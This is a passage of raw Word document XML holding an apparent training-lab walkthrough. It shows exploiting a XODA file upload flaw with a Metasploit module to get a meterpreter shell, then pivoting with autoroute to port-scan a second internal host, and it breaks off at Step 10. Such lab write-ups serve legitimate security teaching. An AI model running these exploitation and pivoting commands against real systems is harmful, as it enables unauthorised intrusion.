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848A" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264AAD47" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:r w:rsidRPr="00345C10">
        <w:t>In this lab, we are given access to a Kali machine. There are two target machines, one on the same network i.e. </w:t>
      </w:r>
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00345C10">
        <w:t>. This target machine is vulnerable and can be exploited using the following information. Use this information to retrieve services running on the second target machine and complete the mission!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E63C1C" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CC44E" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00345C10">
        <w:t> XODA File Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923BEC7" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit module:</w:t>
      </w:r>
      <w:r w:rsidRPr="00345C10">
        <w:t> exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345C10">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345C10">
        <w:t>/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345C10">
        <w:t>xoda_file_upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B5A94FC" w14:textId="77777777" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10" w:rsidP="00345C10">
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00345C10">
        <w:t xml:space="preserve"> - Identify the ports open on the second target machine using appropriate Metasploit modules. - Write a bash script to scan the ports of the second target machine. - Upload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345C10">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345C10">
        <w:t xml:space="preserve"> static binary to the target machine and identify the services running on the second target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E6564" w14:textId="77777777" w:rsidR="00345C10" w:rsidRDefault="00345C10"/>
    <w:p w14:paraId="4FF7DE6A" w14:textId="556D8F46" w:rsidR="00345C10" w:rsidRPr="00345C10" w:rsidRDefault="00345C10">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345C10">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08816B54" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF32A8" w14:textId="4C3A00A6" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6E0B25" wp14:editId="14992340">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1164242458" name="Picture 3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73943" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C9E32" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FDE2B9" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:lastRenderedPageBreak/>
        <w:t>ping -c 4 demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF7EBD" w14:textId="7EA40D31" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769AFD25" wp14:editId="29C4B12E">
            <wp:extent cx="5943600" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="166573317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33171" name="Picture 16657331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06F4" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDA6DE" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B75F87" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">We can now perform a default Nmap port scan on the target to identify the open ports on the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>system,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD87F74" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E74EF" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8CEF6" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>As shown in the following screenshot, the default Nmap scan does reveal open port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028A0E9" w14:textId="2A564490" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A911650" wp14:editId="575B52E5">
            <wp:extent cx="5397777" cy="1917799"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1754671771" name="Picture 32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71771" name="Picture 32" descr="A computer screen shot of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91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F9EA" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Check the HTTP content hosted on port 80 of the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CD55BB" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575ECAF6" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>curl demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D2C03" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>As mentioned in the challenge, a XODA web app instance is running on the system which can be exploited using the “exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>xoda_file_upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>” Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE5777" w14:textId="723987DB" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241DD904" wp14:editId="1A4A3EA7">
            <wp:extent cx="5943600" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="621807703" name="Picture 3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07703" name="Picture 33" descr="A computer screen shot of a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4B0A" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2571C488" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D5FAA" w14:textId="26C61A39" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029BB076" w14:textId="6C46091C" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D867CA" wp14:editId="450FD031">
            <wp:extent cx="2844946" cy="742988"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1008512873" name="Picture 3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12873" name="Picture 34" descr="A black background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5F15" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Select the mentioned module and set the parameter values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C575A8" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203F9463" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>xoda_file_upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="422C5216" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>set RHOSTS demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955F1B5" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>set TARGETURI /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31266CD2" w14:textId="70E8A38C" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>set LHOST 192.198.78.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A297361" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:lastRenderedPageBreak/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C27D5" w14:textId="02DE6120" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2840A8EC" wp14:editId="26B5F3E6">
            <wp:extent cx="5943600" cy="4359275"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="58094141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41417" name="Picture 5809414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D6D2" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> session is spawned on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CDF1DC" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Start a command shell and identify the IP address range of the second target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C447E8" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0777F4" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91C268" w14:textId="1EAE2A29" w:rsidR="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425976EE" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C"/>
    <w:p w14:paraId="4EDBBF83" w14:textId="46069A51" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065AF843" wp14:editId="3DE62A4C">
            <wp:extent cx="5943600" cy="3549015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2105779965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79965" name="Picture 37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D31D" w14:textId="1894FBA7" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">The IP address of the first target machine on its eth1 interface is </w:t>
      </w:r>
      <w:r w:rsidR="008539B2" w:rsidRPr="008539B2">
        <w:t>192.201.167.2</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">, the second target machine will be located at </w:t>
      </w:r>
      <w:r w:rsidR="0055368C" w:rsidRPr="008539B2">
        <w:t>192.201.167.</w:t>
      </w:r>
      <w:r w:rsidR="0055368C">
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>on the second network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05E729" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Add the route to Metasploit's routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7381F1C0" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171CDF9A" w14:textId="40C9CC63" w:rsidR="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="0055368C">
        <w:t>run autoroute -s 192.201.167.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF42A06" w14:textId="1FFFEBDF" w:rsidR="0055368C" w:rsidRPr="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38089DEF" wp14:editId="2F8077AD">
            <wp:extent cx="5607338" cy="1454225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8692334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33437" name="Picture 8692334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5387" w14:textId="77777777" w:rsidR="0055368C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BAE59F" w14:textId="6E7BFED6" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> Background the current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> session and use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> module of Metasploit to scan the second target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2207D3F7" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>CTRL+z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> and Enter y to background the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B5DFC" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49314950" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:lastRenderedPageBreak/>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B980498" w14:textId="1460B489" w:rsidR="0055368C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="0055368C" w:rsidRPr="0055368C">
        <w:t>192.201.167.</w:t>
      </w:r>
      <w:r w:rsidR="007C1DA3">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76598A06" w14:textId="2F89FC12" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>set verbose false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641104DC" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>set ports 1-1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4666D" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A6320" w14:textId="3071C80A" w:rsidR="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18140359" wp14:editId="3E9639B5">
            <wp:extent cx="5943600" cy="3956050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="132959820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98202" name="Picture 13295982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40EC" w14:textId="7A3842DE" w:rsidR="0055368C" w:rsidRPr="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6A4332" wp14:editId="53995B82">
            <wp:extent cx="5512083" cy="1295467"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1827943783" name="Picture 4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43783" name="Picture 40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A276" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Check the static binaries available in the "/</w:t>
